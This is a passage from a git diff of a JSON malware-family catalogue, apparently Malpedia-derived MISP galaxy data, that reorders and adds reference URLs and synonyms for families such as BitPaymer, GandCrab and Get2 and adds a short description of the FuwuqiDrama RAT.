"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp" + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [ "BitPaymer", @@ -25262,13 +26416,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule", - "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf", - "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/", "https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/", + "https://www.mandiant.com/resources/blog/lightshift-and-lightshow", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf", + "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/", "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" + "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf" + ], + "synonyms": [ + "LIGHTSHOW" ], - "synonyms": [], "type": [] }, "uuid": "49b53f39-3e13-48e7-a2e3-5e173af343b3", @@ -25292,11 +26449,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf" ], "synonyms": [ "RouterGod" @@ -25312,10 +26470,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream", "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf" ], "synonyms": [], "type": [] @@ -25349,13 +26507,26 @@ "uuid": "5de632a3-bf82-4cef-90fa-e7199fdb932c", "value": "FusionDrive" }, + { + "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi \u2013 the romanized Chinese word for server.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9284445c-96a8-445d-8e9d-93a093ffbe63", + "value": "FuwuqiDrama" + }, { "description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy", - "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html", - "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/" + "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/", + "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html" ], "synonyms": [], "type": [] @@ -25420,21 +26591,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", + "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", + "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", + "https://nbviewer.org/github/tildedennis/zeusmuseum/blob/master/jupyter_notebooks/gameover/2014-05-28/Gameover%20version%202014-05-28.ipynb", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.lawfareblog.com/what-point-these-nation-state-indictments", + "https://www.wired.com/?p=2171700", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf", - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.wired.com/?p=2171700", - "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", - "https://www.lawfareblog.com/what-point-these-nation-state-indictments", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf" + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [ "GOZ", @@ -25473,68 +26645,68 @@ "value": "Gamotrol" }, { - "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", + "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://unit42.paloaltonetworks.com/revil-threat-actors/", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", - "https://vimeo.com/449849549", - "https://asec.ahnlab.com/en/41450/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/", + "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "https://asec.ahnlab.com/en/41450/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", + "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", - "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", - "https://www.secureworks.com/research/threat-profiles/gold-garden", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", - "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", - "http://www.secureworks.com/research/threat-profiles/gold-garden", - "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", - "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html", - "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/", - "http://asec.ahnlab.com/1145", - "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", - "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", - "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", - "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "http://www.secureworks.com/research/threat-profiles/gold-garden", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://vimeo.com/449849549", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", - "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", - "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", + "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html", + "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", "https://isc.sans.edu/diary/23417", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + "http://asec.ahnlab.com/1145", + "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom", + "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", + "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-garden", + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [ "GrandCrab" @@ -25589,16 +26761,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html", - "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html", "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", - "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", - "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", "https://github.com/eset/malware-ioc/tree/master/turla", - "https://securelist.com/introducing-whitebear/81638/" + "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", + "https://securelist.com/introducing-whitebear/81638/", + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", + "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html" ], "synonyms": [ "WhiteBear" @@ -25613,9 +26786,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://bazaar.abuse.ch/browse/signature/GCleaner/", "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://bazaar.abuse.ch/browse/signature/GCleaner/" + "https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145" ], "synonyms": [], "type": [] @@ -25711,28 +26885,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2", - "https://www.goggleheadedhacker.com/blog/post/13", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", - "https://github.com/Tera0017/TAFOF-Unpacker", - "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/", - "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", "https://intel471.com/blog/a-brief-history-of-ta505", - "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/", + "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/", + "https://www.goggleheadedhacker.com/blog/post/13", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "FRIENDSPEAK", @@ -25761,12 +26935,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", - "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", 